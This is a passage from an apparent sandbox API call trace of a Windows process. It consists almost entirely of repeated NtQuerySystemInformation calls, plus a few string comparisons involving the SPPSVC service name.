ResultLength=0x0) [0272.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc480, Length=0x20, ResultLength=0x0) [0272.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc400, Length=0x20, ResultLength=0x0) [0272.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc400, Length=0x20, ResultLength=0x0) [0272.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc400, Length=0x20, ResultLength=0x0) [0272.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0272.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0272.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0272.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0272.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc500, Length=0x20, ResultLength=0x0) [0272.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc500, Length=0x20, ResultLength=0x0) [0272.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca68, Length=0x50, ResultLength=0x0) [0272.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc990, Length=0x38, ResultLength=0x0) [0272.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc990, Length=0x38, ResultLength=0x0) [0272.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x28, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x28, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc990, Length=0x38, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x20, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc990, Length=0x38, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x20, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x20, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x20, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0272.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0272.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0272.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0272.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0272.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0272.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x28, ResultLength=0x0) [0272.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0272.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0272.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x20, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x20, ResultLength=0x0) [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.975] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f8, Length=0x50, ResultLength=0x0) [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x38, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x38, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0272.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0272.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x38, ResultLength=0x0) [0272.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0272.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x38, ResultLength=0x0) [0272.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0272.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0272.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0272.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc08, Length=0x50, ResultLength=0x0) [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb80, Length=0x28, ResultLength=0x0) [0272.983] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc08, Length=0x50, ResultLength=0x0) [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc08, Length=0x50, ResultLength=0x0) [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.983] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0272.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x38, ResultLength=0x0) [0272.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0272.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 